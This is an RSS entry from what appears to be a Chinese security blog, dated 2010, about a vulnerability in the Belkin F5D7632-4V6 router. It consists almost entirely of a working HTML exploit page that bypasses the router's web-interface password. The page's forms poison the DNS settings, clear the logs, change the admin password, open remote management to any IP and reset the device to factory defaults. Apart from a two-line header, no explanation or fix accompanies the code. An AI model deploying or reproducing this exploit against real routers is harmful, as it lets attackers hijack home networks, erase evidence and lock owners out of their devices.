Chinadu's Blog » 贝尔金 http://www.4shell.org 关注网络安全 Fri, 10 Feb 2012 03:53:40 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 贝尔金无线路由器漏洞 http://www.4shell.org/archives/1488.html http://www.4shell.org/archives/1488.html#comments Fri, 22 Jan 2010 02:31:10 +0000 Chinadu http://www.4shell.org/archives/1488.html

<html>

<head>

</head>

<body>

<b>这个HTML代码可以绕过webinterface密码保护的贝尔金无线路由器+ADSL2调制解调器<br>

它的工作模式F5D7632-4V6与升级固件6.01.08</b>

<br>

<form action="http://192.168.2.1/cgi-bin/setup_dns.exe" name=dnspoison method=post>

改变DNS域名服务器(IP可以不一样)<br>

<input name=page type=hidden value="setup_dns">

<input name=logout type=hidden value="">

<input name=auto_from_isp type=hidden value="0">

<input name=dns1_1 type=text value="1">

<input name=dns1_2 type=text value="2">

<input name=dns1_3 type=text value="3">

<input name=dns1_4 type=text value="4">

<br>

<input name=dns2_1 type=text value="1">

<input name=dns2_2 type=text value="2">

<input name=dns2_3 type=text value="3">

<input name=dns2_4 type=text value="5">

<br>

<input name=submit type=submit value="放毒">

</form>

<br>

<br>

<form action="http://192.168.2.1/cgi-bin/statusprocess.exe" name=clearlog method=post>

清除日志文件<br>

<input name=securityclear type=submit value="清除">

</form>

<br>

<br>

<form ACTION="http://192.168.2.1/cgi-bin/system_all.exe" method=post name=changepassword>

改变时间、密码(如果您有旧的密码)、远程管理、UPnP<br>

和自动固件更新(美好的结合DNS中毒)<br>

<input type="hidden" name="restart_time" value="0">

<input type="hidden" name="reload" value="1">

<input type="hidden" name="restart_page" value='document.location.href="system.stm";'>

<input type="hidden" name="location_page" value="system.stm">

<input type="hidden" name="server1" value="">

<input type="hidden" name="server2" value="">

<!-- for clock -->

<input type="hidden" name="year" value="">

<input type="hidden" name="mon" value="">

<input type="hidden" name="day" value="">

<input type="hidden" name="hour" value="">

<input type="hidden" name="min" value="">

<input type="hidden" name="sec" value="">

<br>旧密码<br>

<input type="password" size="12" maxlength="12" name="userOldPswd" value="">

<br>新密码,两次<br>

<input type="password" size="12" maxlength="12" name="userNewPswd" value="">

<input type="password" size="12" maxlength="12" name="userConPswd" value="">

<br>登录超时(1-99分钟)<br>

<input type="text" name="timeout" size="3" maxlength="3" value="10">

<br> 时间和时区:<br>

夏令: <br>

<input type="checkbox" name="daylight" value="1">时区(号码)<br>

<input type="text" name="time_zone" value="26">

<input type="checkbox" name="enable_ntp" value="1">启用自动时间服务器维护<br>

<tr>

<td width="240">主服务器</td>

<td width="360">

<select name="time1">

<option>132.163.4.102 - North America</option>

<option>192.5.41.41 - North America</option>

<option>192.5.41.209 - North America</option>

<option>207.200.81.113 - North America</option>

<option>208.184.49.9 - North America</option>

<option>129.132.2.21 - Europe</option>

<option>130.149.17.8 - Europe</option>

<option>128.250.36.3 - Australia</option>

<option>137.189.8.174 - Asia Pacific</option>

</select>

</td>

</tr>

<tr>

<td width="240">副服务器</td>

<td width="360">

<select name="time2">

<option>132.163.4.102 - North America</option>

<option>192.5.41.41 - North America</option>

<option>192.5.41.209 - North America</option>

<option>207.200.81.113 - North America</option>

<option>208.184.49.9 - North America</option>

<option>129.132.2.21 - Europe</option>

<option>130.149.17.8 - Europe</option>

<option>128.250.36.3 - Australia</option>

<option>137.189.8.174 - Asia Pacific</option>

</select>

</td>

</tr>

<br>远程管理:<br>

<input type="checkbox" name="allow_all" value="1">任何IP地址都可以远程管理路由器<br>

只有这个IP地址可以远程管理路由器<br>

<input name="IP1" size="3" maxlength="3" value="0">.

<input name="IP2" size="3" maxlength="3" value="0">.

<input name="IP3" size="3" maxlength="3" value="0">.

<input name="IP4" size="3" maxlength="3" value="0">

<br> 远程端口:

<input name="REMOTEPORT" size="5" maxlength="5" value="0">

<br>NAT 授权:<br>

<input type=radio name=Nat_enable value=1>授权<br>

<input type=radio name=Nat_enable value=0>废除<br>

<br>UPnP<br>

<input type="radio" name="upnp_enable" value=1>授权<br>

<input type=radio name=upnp_enable value=0>废除<br>

<br>自动更新固件<br>

<input type="radio" name="autoUpdate_enable" value=1>授权<br>

<input type="radio" name="autoUpdate_enable" value=0>废除<br>

</form>

<form method="POST" action="http://192.168.2.1/cgi-bin/restore.exe" name="RebootForm">

<br>恢复出厂默认值(包括密码)<br>

<input type="hidden" name="page" value="tools_restore">

<input type="hidden" name="logout">

<input type="submit" value="恢复默认值" style="{width:120px;}" class="submitBtn">

</form>

</body>

</html>

随机日志

]]> http://www.4shell.org/archives/1488.html/feed 0